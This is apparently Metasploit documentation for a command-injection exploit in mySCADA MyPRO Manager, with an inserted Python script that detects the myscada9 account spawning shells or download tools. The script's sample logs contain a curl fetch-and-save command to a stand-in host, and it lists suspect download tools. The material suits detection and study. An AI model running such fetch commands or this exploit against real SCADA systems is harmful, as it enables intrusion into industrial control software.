Path: blob/master/documentation/modules/exploit/windows/scada/mypro_mgr_cmd.md
Vulnerable Application
Vulnerability Description
This module exploits a command injection vulnerability in mySCADA MyPRO Manager <= v1.2 (CVE-2024-47407).
An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of myscada9, an administrative user that is automatically added by the product during installation.
Versions <= 1.2 are affected. CISA published ICSA-24-326-07 to cover the security issues. The official changelog from the vendor for the updated version is available here.
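A detection check that follows from the description above, as an added example that is not part of the module documentation or the Metasploit project: it flags process-creation records in which the myscada9 account starts a command interpreter or download tool. The JSON-lines log layout, the host names and the contents of the suspect list are assumptions; the field names are those of Windows event 4688.

```python
import json
import ntpath

# Account named on the page: injected commands run in its context.
SERVICE_ACCOUNT = "myscada9"

# Assumption: interpreters and download tools this account should not normally
# launch. curl is the fetch command in the page's scenario; the others are
# common Windows equivalents. Baseline against your own hosts before alerting.
SUSPECT_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe", "certutil.exe"}

# Constructed sample: process-creation records, one JSON object per line.
# Hosts, paths and command lines are invented; the last line is truncated.
SAMPLE_EVENTS = r"""
{"EventID": 4688, "Computer": "HMI-01", "SubjectUserName": "myscada9", "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c curl -so x.exe http://192.0.2.10/x"}
{"EventID": 4688, "Computer": "HMI-01", "SubjectUserName": "MYSCADA9", "NewProcessName": "C:\\Windows\\System32\\curl.exe", "CommandLine": "curl -so x.exe http://192.0.2.10/x"}
{"EventID": 4688, "Computer": "HMI-01", "SubjectUserName": "myscada9", "NewProcessName": "C:\\Example\\example-service.exe", "CommandLine": "example-service.exe"}
{"EventID": 4688, "Computer": "WS-07", "SubjectUserName": "alice", "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"}
{"EventID": 4624, "Computer": "HMI-01", "SubjectUserName": "myscada9"}
{"EventID": 4688, "Computer": "HMI-01", "SubjectUs
"""


def find_suspect_process_creations(lines):
    """Return (computer, image, command_line) for each flagged 4688 record."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines instead of aborting
        if event.get("EventID") != 4688:
            continue  # only process-creation events are relevant here
        # Account names are case-insensitive on Windows, so compare lowercased.
        user = str(event.get("SubjectUserName", "")).lower()
        image = ntpath.basename(str(event.get("NewProcessName", ""))).lower()
        if user == SERVICE_ACCOUNT and image in SUSPECT_IMAGES:
            hits.append((event.get("Computer"), image, event.get("CommandLine", "")))
    return hits


if __name__ == "__main__":
    for hit in find_suspect_process_creations(SAMPLE_EVENTS.splitlines()):
        print(hit)
```

Command-line text appears in event 4688 only when command-line auditing is enabled in the audit policy; without it the check still matches on account and image name.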
Vulnerable Application Installation
A trial version of the software can be obtained from the vendor.
Successfully tested on
mySCADA MyPRO Manager 1.2 on Windows 11 (10.0 Build 22621)
Verification Steps
Install the application
After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
Start msfconsole and run the following commands:
You should get a meterpreter session in the context of myscada9.
Scenarios
Running the exploit against MyPRO Manager v1.2 on Windows 11, using curl as a fetch command, should result in an output similar to the following: